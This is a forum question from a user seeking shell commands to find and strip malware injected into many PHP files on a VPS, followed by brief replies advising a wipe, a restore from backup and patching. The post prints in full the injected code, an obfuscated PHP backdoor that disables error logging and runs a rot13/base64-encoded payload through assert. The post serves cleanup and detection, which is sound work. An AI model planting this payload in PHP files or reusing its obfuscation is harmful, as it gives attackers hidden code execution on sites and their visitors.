# SSH command to find and delete Malware code in all files that contain a string

Tags: php, malware, virus

This is the command I am using to find and display a list of these malware files:

```
find /home/ -name "*.php" -exec grep -l "riny(" {} \;
```

I want remove Malware code in all file that i found (I found in many files).

My VPS is infected with the following Malware code:

```
<?php 
//###==3==###
@error_reporting(E_ALL);
@ini_set("error_log",NULL);
@ini_set("log_errors",0);
@ini_set("display_errors", 0);
@error_reporting(0);
$wa = ASSERT_WARNING;
@assert_options(ASSERT_ACTIVE, 1);
@assert_options($wa, 0);
@assert_options(ASSERT_QUIET_EVAL, 1);

$strings = "as"; $strings .= "se";  $strings .= "rt"; $strings2 = "st"; $strings2 .= "r_r";  $strings2 .= "ot13"; $gbz = "riny(".$strings2("base64_decode");
$light =  $strings2($gbz.'("nJLtXPScp3AyqPtxnJW2XFxtrlNtDTIlpz9lK3WypT9lqTyhMluSK0SZGPx7DTyhnI9mMKDbVzEcp3OfLKysMKWlo3WmVvk0paIyXGgNMKWlo3WspzIjo3W0nJ5aXQNcBjccMvtuMJ1jqUxbWS9QG09YFHIoVzAfnJIhqS9wnTIwnlWqXFNzWvOyoKO0rFtxnJW2XFxtrlNxnJW2VQ0tWS9QG09YFHIoVzAfnJIhqS9wnTIwnlWqBlNtMJAbolNxnJW2B30tMJkmMJyzVPuyoKO0rFtxnJW2XFxtrjccMvNbp3Elp3ElXPEsH0IFIxIFJlWVISEDK0uCH1DvKFjtVwRlAl4jVvxcrlEhLJ1yVQ0tWS9GEIWJEIWoVyASHyMSHy9OEREFVy07sJIfp2I7WT5uoJHtCFNxK1ASHyMSHyfvFSEHHS9VG1AHVy07sDbxqKAypzRtCFOcp3AyqPtxK1ASHyMSHyfvFSEHHS9IH0IFK0SUEH5HVy0cC3IloTIhL29xMFtxK1ASHyMSHyfvFSEHHS9IH0IFK0SUEH5HVy0cBvVvBjbxqKWfVQ0tVzu0qUN6Yl9coaMyp3EcozqmoJSlqTk5YzAioF9aMKDhpTujC2yjCFVhqKWfMJ5wo2EyXPEsH0IFIxIFJlWFEH1CIRIsDHERHvWqXF4vWzD9Vv51pzkyozAiMTHbWT5uoJHhWS9GEIWJEIWoVyWSHIISH1EsIIWWVy0cYvVzqG0vYvE1p2IlLF4vWzx9ZFMbCFVhoJD1XPVjAQLkZJEwAQN5LwV3LJZkZ2RlL2H4AJEwAmuuA2V4AmRkVvx7PzyzXTM1ozA0nJ9hK2I4nKA0pltvL3IloS9cozy0VvxcVUfXWTAbVQ0tL3IloS9cozy0XPE1pzjcBjcwqKWfK3AyqT9jqPtxL2tfVRAIHxkCHSEsFRIOERIFYPOTDHkGEFx7L3IloS9mMKEipUDbWTAbYPOQIIWZG1OHK0ACGx5SD1EHFH1SG1IHYPN1XGftL3IloS9mMKEipUDbWTAbYPOQIIWZG1OHK1EWGHICIIDfVQHcBjcwqKWfK3AyqT9jqPtxL2tfVRAIHxkCHSEsHxIHIIWBISWOGyATEIVfVSEFIHHcBjbxnJW2VQ0tL3IloS9yrTIwXPEwnPx7WTyhMz8tCFOwqKWfK2qyqTyhMz8bWTAbXGgcMvNbWTyhMz9oVzu0qUOsL29xMFWqVG0lZQNcrlEcLaL9VvV7sDcwqKWfK2Afo3AyXPEwnPx7Pa0tMJkmMJyzXTyhnI9aMKDbVzSfoT93K3IloS9zo3OyovVcVQ09VQRcVUfXWTyvqvN9VTMcoTIsM2I0K2AioaEyoaEmXPE1pzjcBjc9PzyzXPSyoKO0rFtxK1OCH1EoVaNvKFxtWvLtoJD1XT1xAFtxK1OCH1EoVaNvKFxcVQ09VPWyMTH2MQIzZwH0MwD5AJZ0LzZ3Z2MuLzR1ZJDmAmIxLlVcVUftDTI2LJjbp3ElnKOmoTSmnTImXPEsHR9GISfvLlWqXFx7VU0XMJAbolNxnJW2Bjc9VU0="));'); $strings($light);
//###==3==###
?>
```

Help me!!!!

Comment: 1. Delete everything. 2. Restore from backup. 3. Patch your apps so you're not immediately compromised again.

Comment: @Sammitch Since I do not manage this vps, I'm not sure it has a backup. And it has too many sites. but still thank you much.

Comment: *You* are responsible for your backups *always*.

Comment: @Sammitch yes, i will